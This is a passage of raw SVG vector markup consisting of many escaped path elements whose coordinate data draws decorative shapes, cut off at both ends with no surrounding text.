d=\"M599.7,56.7c1.8-.1,1.9-.6-2-.7C598.6,56.2,596.5,56.6,599.7,56.7Z\"></path>\n        <path d=\"M727.2,56.4c-3.8-.1-4.5,0-3.9.3,2,0,3.2.1,4.4.2C727.3,56.7,724.7,56.6,727.2,56.4Z\"></path>\n        <path d=\"M737.8,55.9c1.9,0,3.2.1,4.4.2,0-.3-.9-.6-3.4-.7C739.4,55.6,738.9,55.8,737.8,55.9Z\"></path>\n        <path d=\"M869.9,52.8c1.3.4-2.2.3-.8.6,3.3.1,5.4.1,7,0C876.1,53.1,873.9,52.9,869.9,52.8Z\"></path>\n        <path d=\"M626,40.8c-3.5-.1-4.8.4-2.3.5C625.1,41.2,627.5,41.2,626,40.8Z\"></path>\n        <path d=\"M647.7,38.7c-3.6.1-2.1.7,2.2.9C647.5,39.2,649.9,38.9,647.7,38.7Z\"></path>\n        <path d=\"M639,35.1a4,4,0,0,0-1.6-.3c.2.2.3.4.5.6,3.7.2,6-.2,2.4-.4C640.3,35.1,640.2,35.2,639,35.1Z\"></path>\n        <path d=\"M755.1,31.3c-2.7,0-3.2-.2-5.8-.2,5.2.7-5.5,1,1.3,1.4C753,32.2,750.2,31.4,755.1,31.3Z\"></path>\n        <path d=\"M688.7,25.2a10.17,10.17,0,0,1-2.7,0c-.3-.1,0-.3-1.7-.4,1.2.5.4,1,4.9.9C683.7,25.5,694.9,25.5,688.7,25.2Z\"></path>\n        <path d=\"M706.2,19.9a26.2,26.2,0,0,1-2.8-.1c-.4-.2.1-.4-1.8-.5-.4.2-2.8.2-2.3.5C702.5,20,705.5,20.3,706.2,19.9Z\"></path>\n        <path d=\"M739.6,13.7c1-.1,1.7-.2,1.7-.4,1.1.4,3.7.8,5,1.2-.5-.4-3-.9-5.5-1.5a.08.08,0,0,1,.1.08v0a34.18,34.18,0,0,0-3.5-.3C738.5,13.1,736.3,13.5,739.6,13.7Z\"></path>\n        <path d=\"M527.9,101.5c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-5.8.7-1,1.9-1.3,3-.1.3-.7.6-2.2.9,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.51,41.51,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.06,98.06,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,2.7.1,1.9-.2,3-.2h1c2.8.2,2.4.6,4.8.8a21.29,21.29,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C525.6,101.8,526,101.6,527.9,101.5Z\"></path>\n        <path d=\"M732.3,103.2c-.7.3,4.1.3,3.3.6-6.8-.1-2.6.5-6.4.6,6.2-.1-.9.3.6.7,8.9-.4,4.4-1.6,7.7-2.3C729.7,102.6,738.3,103.3,732.3,103.2Z\"></path>\n        <path d=\"M526,99.3c-2.3.1-8.6.3-5,.7C519.7,99.4,528.4,99.9,526,99.3Z\"></path>\n        <path d=\"M524.2,94.1c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C528.3,93.5,521.8,93.8,524.2,94.1Z\"></path>\n        <path d=\"M536.7,95.7c2.9-.1,4.8-.3,6.5-.5C537.2,94.9,535.1,95.6,536.7,95.7Z\"></path>\n        <path d=\"M734.1,99c3.5.1,2.9-.1,7,0C740.5,98.1,739.3,98.7,734.1,99Z\"></path>\n        <path d=\"M519,89.8c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C515.9,89.2,521.6,89.4,519,89.8Z\"></path>\n        <path d=\"M652.2,86.4c-1.3-.9-6.3-2.1-1-2.8-5.1,0-2.2.2-5.8-.2,2.4.7-11.4,1.2-3.7,2.1-1.7,0-4-.1-4.2,0,6.1.1,1,.4-1,.4,2.8.6-.4,1.4-1,2.1,3.4-.1,7.1.4,7.1.2-2-.1-1.8-.3-3.1-.4,8.8.2,6.5-.2,12.5,0-6.6-.3,1.6-1.2-5.2-1.2C646.8,86.3,651.5,86.5,652.2,86.4Z\"></path>\n        <path d=\"M609.4,72.5c4.1.1,11.6,1,3.2.5.3.4,6.8.4,8.9.6-.5-.4-3.6-.6-4.9-.9C615.6,73.2,611.9,72.1,609.4,72.5Z\"></path>\n        <path d=\"M603.1,63.8a15.43,15.43,0,0,1-2.8-.1,64,64,0,0,0,7.8.9C606.2,64.4,607.1,63.9,603.1,63.8Z\"></path>\n        <path d=\"M601.6,63.6c-1.4-.3,7.4.3,2.7,0a6.88,6.88,0,0,1-1.5-.1c-.1-.1,2.4,0,2.6-.2C602,62.8,597.5,63.4,601.6,63.6Z\"></path>\n        <path d=\"M599.9,60.1c-8.5-.4,4.4-.8-3.9-1.3-2.1.7-4.2,1.6-4.6,2.7C598.8,61.3,592.5,60.3,599.9,60.1Z\"></path>\n        <path d=\"M754.7,60.9c2-.7,3.2-1.4,3.6-2.2-4.6-.1-1.6-.7-7.6-.7C760.3,58.7,749.6,59.9,754.7,60.9Z\"></path>\n        <path d=\"M598.3,55.2c4.7-.2,2.4-.6,7.6-.8-9.4.2,4.6-.4-6.2-.7C598.3,54.6,597,54.4,598.3,55.2Z\"></path>\n        <path d=\"M601,53.5c0-.2,4.6,0,3.9-.2-1.1-.1-2.8-.1-2.9-.2,2.1,0,5.3.2,5.6,0-3.9-.3,3.8-.7-2.2-.9,2.3.1,3.7-.1,1.2-.2a19.08,19.08,0,0,1-4,.1c.2.3,2.7.4,2,.7-4.1,0-.6.2-5.4.2C603.1,53,596,53.3,601,53.5Z\"></path>\n        <path d=\"M600,49.2c9,.1.5.9,6.4,1-.7-.3,0-.4,2.6-.2,0-.6,1.8-.5-3.4-.7.6-.5,3.2-.2,5.2-.4-2.3,0-9.8-.6-7.3-.4C607.4,48.9,602.5,49.1,600,49.2Z\"></path>\n        <path d=\"M643.7,37.3c-.2-.2.5-.2,1.1-.3-5.2-.1-10.6-.6-17-.4,1.5.2,1,.6,3.4.7,1.3-.4.4-.5,3.6-.7C634.5,37.1,643.4,36.9,643.7,37.3Z\"></path>\n        <path d=\"M686.7,26.1a14.19,14.19,0,0,1-3.9.3c-.1-.1-.3-.1-1.5-.1a8.94,8.94,0,0,0,3.2.5C682.1,26.4,692.6,26.6,686.7,26.1Z\"></path>\n        <path d=\"M722.6,95.4a28.18,28.18,0,0,0-7.5-.6c-.2.2,2.1.3,3.1.4-5.8-.1-12.8.2-6.4.6-9,.4-16.9,1.3-11.5,2.7-3.4.5-11.3,1.3-5.1,2.1-5,0-.7.8-3.3,1,1.7.1,3.4.1,3,.3-7.9,1.3-2.1,3-8.6,4.4,7.5.2,1.7.8,5.1,1.1.7-.4,4.7-.5,6.2-.8-1.7-.1-4-.1-4.3-.2a29.54,29.54,0,0,1,5.4-.2c4.4,0,1,.6,6.1.6-13.3-2.2,18.3-2.7,6.9-4.8a20.06,20.06,0,0,0,4.1-.1c-8-.6,5-1-2.7-1.5,7.2.2,3.1-.8,1.9-1,9.2-.5,1.1-1.8,7.5-2.6-2-.2-2.2-.4-4.7-.5,6.4.2,4.4-.2-.1-.1-.1-.2-.6-.4-1.8-.5,4.5,0,4.6.3,7.1.2C724.3,95.5,715.8,95.3,722.6,95.4Z\"></path>\n        <path d=\"M750.3,110.5c-2.7-.3-.9.9.5,1.1C750.9,111.2,751.8,111.1,750.3,110.5Z\"></path>\n        <path d=\"M770.6,108.3a42.59,42.59,0,0,0-7.2-1c4.7,1.1,1.7,1.7,5.2,2.9-.6-.5-.5-.8,2.8-.3C770.3,109,769.1,108.7,770.6,108.3Z\"></path>\n        <path d=\"M766.9,104.6c1.4.3,2.1.5,4.2.8.8,0,1.2-.1.8-.4C769,104.6,769.1,104.9,766.9,104.6Z\"></path>\n        <path d=\"M768.1,103c.7.6-1,1,3.8,1.8C771.2,104.4,774.4,104.3,768.1,103Z\"></path>\n        <path d=\"M745.3,93.6c-4.8-1-3.5,0-.8.4C744.1,93.7,744.5,93.6,745.3,93.6Z\"></path>\n        <path d=\"M768.6,95.7c-1.8-.1-.3.6,1.4,1C769.3,96.3,770.9,96.1,768.6,95.7Z\"></path>\n        <path d=\"M914.7,118.4c0,.8-1.8-.5-5.3-1a21.54,21.54,0,0,0,4.5,1.4,5.88,5.88,0,0,1,2,.2C915.7,118.9,916.1,118.7,914.7,118.4Z\"></path>\n        <path d=\"M745.2,89.2c-3.3-.6-3.5-.3-3.9-.1a9.76,9.76,0,0,0,3.4,1.1c.7-.2-1.8-.6-2.4-.9a21,21,0,0,0,4.1.5C745.2,89.5,745.2,89.4,745.2,89.2Z\"></path>\n        <path d=\"M753.7,82.5c-.1-.4-3.3-.5-2.4-.9,3.1.7,2.8-.7-1.7-1.5-.1.5-1.2.5,1.6,1.3-8.4.1-9.5,2.2-5.5,4.9-2.2-.2-2.2.1-3.9,0,3.2,1.2-3.7,1.5,3.2,2.8-1.9-1.3,1.5-2.2,1.2-3.6-.1-.6-2.8-1.8,1.3-1.3-.2.1-1.4,0-.8.3,6.6,1-.3-.9,2.7-.6.6.5,2.9.6,1.3.8,2.8.5,2.6.2,2.9,0-1.8-.5-2.5-1.3-.5-1.1-2.2-.5-1.3-.2-4.2-.7.7.4.7,1.2-2.8.2,5.1.6-.2-1,2.5-.8a24.35,24.35,0,0,0,4.3.9c-.8-.6-.1-.4-3.4-1.1C751,82,754.4,83.1,753.7,82.5Z\"></path>\n        <path d=\"M919.6,106.2c-2.8,1.6-6.4,2.3-6.4,4.9,1.7.4,4.5,1,5.5,1.4-5.8-1.2-.7.8-6.1-.6-.6.4-.8.8,1.7,1.6-1.1-.7,2.6.2,4.1.6-.2-.2.1-.3.8-.3-1.7-.5-4.5-.9-5.4-1.1,1.2-.2,3.5.2,7,.5-2.2-.8.2-.5.6-.8-6-1-.7-.9-3.7-1.7,1.3.2,1.4.1,3.1.4-1.6-.6-.5-.8.5-1-1.3-.3-2.4-.5-3.3-.8,5.3-.4,2-2.2,5.6-2.5l-2.1-.3A12.12,12.12,0,0,0,919.6,106.2Z\"></path>\n        <path d=\"M929.1,114.2c-2.7-.4-4-.5-4-.2,2,.3,2.3.5,1.2.4,1,.2,2.1.3,3.1.5C928.3,114.4,928.3,114.4,929.1,114.2Z\"></path>\n        <path d=\"M925.7,110.9c1,.6-1,.4-.6.8C929.6,112.6,928.9,111.5,925.7,110.9Z\"></path>\n        <path d=\"M925.4,106.1c-3.8-1-8.8-.7-4.9,0C920.5,105.6,922.4,105.7,925.4,106.1Z\"></path>\n        <path d=\"M888,100.6c-.3-.4,3.5-.3.5-1C889.5,100.2,884.6,99.8,888,100.6Z\"></path>\n        <path d=\"M646.5,59.9c1,.2,2.1.3,3.1.5.3-.2,2.1-.3-1.4-.9C647.8,59.7,645.8,59.4,646.5,59.9Z\"></path>\n        <path d=\"M911,102.4c-.1.3.6.7,2.4,1.1C912.7,103.1,914.8,102.9,911,102.4Z\"></path>\n        <path d=\"M920.4,101.6c7.6,1.3.7-.6,3.6-.6C918,100.1,922.6,101.5,920.4,101.6Z\"></path>\n        <path d=\"M954.4,106.1c-.9-.1-1.9.4.4.8C955.8,107,956.7,106.6,954.4,106.1Z\"></path>\n        <path d=\"M934.9,101.7a10.32,10.32,0,0,1,2.2.5c-.8-.1-1.2-.1-.9.1,2.8.5,2.6.2,2.9,0C936.4,101.8,935.7,101.5,934.9,101.7Z\"></path>\n        <path d=\"M926.5,98.2c-4.7-.7-.6,1.2-6.9-.3,1.9,1,3,1.3.8,1.7,4.7.8,3.4.1,4.8,0C920.3,98.5,929.4,99.4,926.5,98.2Z\"></path>\n        <path d=\"M906,95.6c-2.6-.8.1-.6-4.5-1.4C901.8,94.6,902.5,95.1,906,95.6Z\"></path>\n        <path d=\"M921.7,98.1c.8-.2,3.5-.1-.5-1C922,97.6,918.5,97.4,921.7,98.1Z\"></path>\n        <path d=\"M956.7,102.7c1.6.1,3.4,0-1.3-.8C956.1,102.2,954.5,102.4,956.7,102.7Z\"></path>\n        <path d=\"M929.9,97.1c1.1.4.6.7,2.4,1.1C933.8,98.2,933.8,97.6,929.9,97.1Z\"></path>\n        <path d=\"M955,99.1c-2.7-.5-3.9-.1-1.8.4C953.8,99.4,955.7,99.6,955,99.1Z\"></path>\n        <path d=\"M822.7,76.8c1.6,0,1.1.8,3.5,1.2-1.1-.6,1.3-.4.5-.9C824.2,76.8,820,76,822.7,76.8Z\"></path>\n        <path d=\"M954.7,98.3a7.45,7.45,0,0,1-2-.1,5.75,5.75,0,0,0,2.3.8C955.2,98.9,956.1,98.7,954.7,98.3Z\"></path>\n        <path d=\"M907.2,89.8c-1.4-.6,1.5,0,1.9-.1-2.5-.6-4.3-.4-7.2-.9C904.3,89.2,905.9,89.5,907.2,89.8Z\"></path>\n        <path d=\"M946.5,95.4c-.7.2,1.8.6,3.4,1C951.2,96.2,950.4,95.8,946.5,95.4Z\"></path>\n        <path d=\"M907.6,88.8c-.4.3-1.7-.5-3.2-.6a14.05,14.05,0,0,1-2.9,0,56,56,0,0,1,6.3,1.2C906.8,88.9,910.8,89.4,907.6,88.8Z\"></path>\n        <path d=\"M887.5,85.1c-1.8-.3-3.3-.6-4.3-.8a5.13,5.13,0,0,0,2.4,1.1C884.7,84.8,887.2,85.3,887.5,85.1Z\"></path>\n        <path d=\"M890.7,83.5c-2.2-.3-2.1-1.1-3.4-1,2.5.9-8.7-1.2-3.9,0C885.2,82.5,888,83.4,890.7,83.5Z\"></path>\n        <path d=\"M897.9,84.4c-1.9-.2-4.7-.6-5-.4C896.3,84.6,897.8,84.7,897.9,84.4Z\"></path>\n        <path d=\"M1056.2,110.9c2.9.5,2.9.2,2.9-.1C1055.8,110.2,1055.9,110.5,1056.2,110.9Z\"></path>\n        <path d=\"M893.1,82.5a17.84,17.84,0,0,1-3.3-.8c1,.6-1.2,1,2.8,1.8C893.1,83.1,891.9,82.8,893.1,82.5Z\"></path>\n        <path d=\"M923.4,87.3c-.4.3-5.3-.1.5,1C922.2,87.6,926.4,88,923.4,87.3Z\"></path>\n        <path d=\"M930.9,84.8c1,.5-2.8-.2-1.8.3,1.1.2,2.1.3,3.1.5C931.6,85.1,934.5,85.5,930.9,84.8Z\"></path>\n        <path d=\"M918.5,82.9c.3-1,1.3-.9,3-1.8-5.3-.9-5.7-.8-1.8.3-2-.4-2.2-.2-4.1-.6C919.4,81.8,914,82.1,918.5,82.9Z\"></path>\n        <path d=\"M918.3,80.5c4.8.8,3.8,0,4.7-.3C919,79.6,919.6,80.3,918.3,80.5Z\"></path>\n        <path d=\"M722.2,46.1c-4.1-.8-1.3,1.2-.5,1C721.8,46.5,721.5,46.4,722.2,46.1Z\"></path>\n        <path d=\"M945,81.8a13,13,0,0,1-3.1-.4c3.8,1,1.2,1.1,4.8,1.9C945.9,82.8,947.5,82.4,945,81.8Z\"></path>\n        <path d=\"M890.7,73.1c-3-.6-2.6-.3-5.2-.8-.2-.2-.4-.3-2.2-.6C882.7,72.2,890.6,73.5,890.7,73.1Z\"></path>\n        <path d=\"M1009.7,91.9c-.1.2-3,.4,1.5,1.1C1010.4,92.6,1012.1,92.4,1009.7,91.9Z\"></path>\n        <path d=\"M936.2,79.4c1.9.8-5.4-.9-5.1-.5,3.1.6,2.3.9,4.5,1.4C934.7,79.8,940.1,80.4,936.2,79.4Z\"></path>\n        <path d=\"M741.9,46.7c-2.8-.4-4.4.5-1.5,1C740.5,47.2,741.8,47.1,741.9,46.7Z\"></path>\n        <path d=\"M1001.9,89.8c-3.8-.9-1.6-.9-4.6-1.5.1.6,2.4,1.3,3.8,2C1000.1,89.8,1002.5,90.2,1001.9,89.8Z\"></path>\n        <path d=\"M940.9,79.1c-.4.2-1.8.4.6,1.2C941.6,80.2,943.5,79.9,940.9,79.1Z\"></path>\n        <path d=\"M935.5,77.9c-1.8-.3-3.3-.6-4.3-.8-.6.4,2.3.9,2.6,1.3-1.5-.3-1.9-.5-3.3-.8a.35.35,0,0,0,.1.2c-.7-.1-1.2-.2-1-.1,3.3.5,1.6.6,4.4,1.1,2.7,0,.4-.5-.5-1.2A13.6,13.6,0,0,0,935.5,77.9Z\"></path>\n        <path d=\"M924.6,77.3c.2-.3,2.1-.8-.7-1.6C923.6,76.2,920.8,76.2,924.6,77.3Z\"></path>\n        <path d=\"M764.7,49.9c.6-.2-3.8-1.3-5.4-1.2,1.9.3,2.5.5,2.3.7C762.6,49.6,763.6,49.7,764.7,49.9Z\"></path>\n        <path d=\"M751.3,46.1c-2.5-.3-4.5-1.1-5.2-.9,1.6.4,3,1,1.4.9l2.1.3c.6.1,1.2.2,1,.1C746.7,45.7,753.5,46.9,751.3,46.1Z\"></path>\n        <path d=\"M1049.1,95.4c-2.4-.4-4-.7-5.2-.8.2.2,0,.3,1.2.5C1044.4,94.8,1050.3,96.1,1049.1,95.4Z\"></path>\n        <path d=\"M891.8,69.4c-2.5-.7-5.2-.7-7.4-1.3C884,68.5,889.8,69.2,891.8,69.4Z\"></path>\n        <path d=\"M941.8,76.9c3.4,0,1.5.6,4.4,1.1.2-.5-1-1-5.6-1.7C940.8,76.5,940.4,76.6,941.8,76.9Z\"></path>\n        <path d=\"M890.2,65.8c-5.8-.7-6.1,0-4.5.8,3.3.4,3.3-.2,5.8,0-3.5-.9-2.2,0-4-.2a8.44,8.44,0,0,0-1.2-.4C887.4,65.8,890.4,66.2,890.2,65.8Z\"></path>\n        <path d=\"M1005.1,86.2c3.3.6,2.2,0,6.2.8-.2-.2.1-.3.8-.3C1009.3,86.4,1006.9,86.3,1005.1,86.2Z\"></path>\n        <path d=\"M895.6,67.1c0,.1-.1.1-1-.1,0-.2-1-.4-2.3-.7.7.4-.9.6,1.4,1-.1-.1-.1-.2-.2-.4C895.9,67.5,898.6,67.7,895.6,67.1Z\"></path>\n        <path d=\"M749.3,41.8c.1.4-3.3.4.5,1.1C749.3,42.5,752.4,42.5,749.3,41.8Z\"></path>\n        <path d=\"M887.3,63.9a13,13,0,0,1-3.1-.4c-1,.4,3,1.1,4.6,1.7C889.6,65.1,889,64.3,887.3,63.9Z\"></path>\n        <path d=\"M1130.5,104.1c1.3.2,1.5.4,3.2.6-.4-.3,1.3,0,1.9,0A21.88,21.88,0,0,0,1130.5,104.1Z\"></path>\n        <path d=\"M779.9,45.1c3.5.6,5.6.3,1.8-.4C780.2,44.6,781.3,45.2,779.9,45.1Z\"></path>\n        <path d=\"M971.3,76.1c-1,0-4.7-.1-.7.7a5.88,5.88,0,0,1,2,.2C968.9,76,974.2,76.9,971.3,76.1Z\"></path>\n        <path d=\"M892.3,62.1c-4.3-.7-8.6-.3-4.6.6-.8-.4.2-.4,3,.2C886.9,61.8,895.8,63.1,892.3,62.1Z\"></path>\n        <path d=\"M1084.6,94.9c2.7.2,2.5-.4-1.5-1.1C1084.3,94.3,1081.9,94.3,1084.6,94.9Z\"></path>\n        <path d=\"M1051.7,88.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3.5.6-2.9,0,2.3.8C1049.9,88.6,1052.3,89,1051.7,88.7Z\"></path>\n        <path d=\"M897.1,61.9c2.5.4.9.6-.8.3-1.1-.3-1.9-.6-3.3-1,.3.3-2,.4,1.5,1.1,1.1-.5,1.5.6,5.3,1C900.7,63.4,901,62.3,897.1,61.9Z\"></path>\n        <path d=\"M1045.7,86.2c.3.3-.7.2-3-.2,0,.1.2.8,1.3.7C1042.4,86,1050.5,87.4,1045.7,86.2Z\"></path>\n        <path d=\"M1027.2,83.8a20.39,20.39,0,0,1,2.2.6c.5-.2,3.6-.1-.4-.8C1030.1,84.1,1028.3,83.9,1027.2,83.8Z\"></path>\n        <path d=\"M1008.3,78.7c-.3.2-2.9-.3-1.8.3a21.3,21.3,0,0,0,4.2.7c.2.2.1.4,2.3.7l-.3-.6C1009.4,79.3,1010.4,79.1,1008.3,78.7Z\"></path>\n        <path d=\"M769.3,36.9c1.4-.2-3.6-.7-3.3-.9,4.7.6-2.5-.9,1.8-.4-2-.3-2.4-.5-4.3-.8.3.9,2.5,1.9-1.1,1.8,3.3.8,1.3,1.4,4.9,2.3.1-.5,1.3-1-.9-1.9,1.1-.1,4.5,1,4.1.5C768.1,37,765.1,35.9,769.3,36.9Z\"></path>\n        <path d=\"M898.2,60.1l-5.2-.9c0,.3-1.8,0,1.3.7C894.2,59.6,898.2,60.4,898.2,60.1Z\"></path>\n        <path d=\"M856.5,51.7c1.3.6-2,0-2.9.1a17.84,17.84,0,0,1,3.3.8C857.9,52.6,858.8,52.2,856.5,51.7Z\"></path>\n        <path d=\"M795,42.2c-3-.7-.8-1.1-4.8-1.9C791.1,40.8,790.1,41.2,795,42.2Z\"></path>\n        <path d=\"M836.8,48.8c-.7-.5,2.7.2,2.9-.1-1.4-.2-2.3-.4-3.2-.6C837.7,48.6,833.5,48.1,836.8,48.8Z\"></path>\n        <path d=\"M911,60.6c-.3.2-4-.6-2.9,0C911.4,61.2,913.8,61.2,911,60.6Z\"></path>\n        <path d=\"M747.2,33.1a5.88,5.88,0,0,1-2-.2c0,.3.8.6,2.4,1C746.2,33.3,750.4,33.8,747.2,33.1Z\"></path>\n        <path d=\"M760.1,35.8c-.1-.4-1.2-.8-3.5-1.2,0,.2-3.4-.5-3-.2C756.3,34.9,756.9,35.3,760.1,35.8Z\"></path>\n        <path d=\"M1052.6,84.4c-.1-.2-.1-.3-.2-.5-2-.3-4.5-.7-4-.3,1.8.3,2.6.3,3.2.5C1051.6,84.2,1051.7,84.2,1052.6,84.4Z\"></path>\n        <path d=\"M889.9,57c-1.1-.5,2.6.2,2.9,0a28.82,28.82,0,0,1-4.3-.9C887.9,56.2,887.7,56.4,889.9,57Z\"></path>\n        <path d=\"M842.5,48.7c1.7.3.7.4,2.3.7-1.7-.7,5.7.6,1.8-.3C847.5,49.6,841.6,48.3,842.5,48.7Z\"></path>\n        <path d=\"M792.2,40.4c1.4-.4,3-1.3-2.2-2.6-3.1-.2,2.2,1.1,1.6,1.4a19.06,19.06,0,0,0-3.1-.4C792.8,39.5,789.2,39.7,792.2,40.4Z\"></path>\n        <path d=\"M893.8,56.9c0-.3,1.7-.2,1.7-.5C892.6,55.9,891.5,56.4,893.8,56.9Z\"></path>\n        <path d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n        <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n        <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n        <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n        <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n        <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n        <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n        <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n        <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n        <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n        <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n        <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n        <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n        <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n        <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n        <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n        <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n        <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n        <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n        <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n        <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n        <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n        <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n        <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n        <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n        <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n        <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n        <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n        <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n        <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n        <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n        <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n        <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n        <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n        <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n        <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n        <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n        <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n        <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n        <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n        <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n        <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n        <path 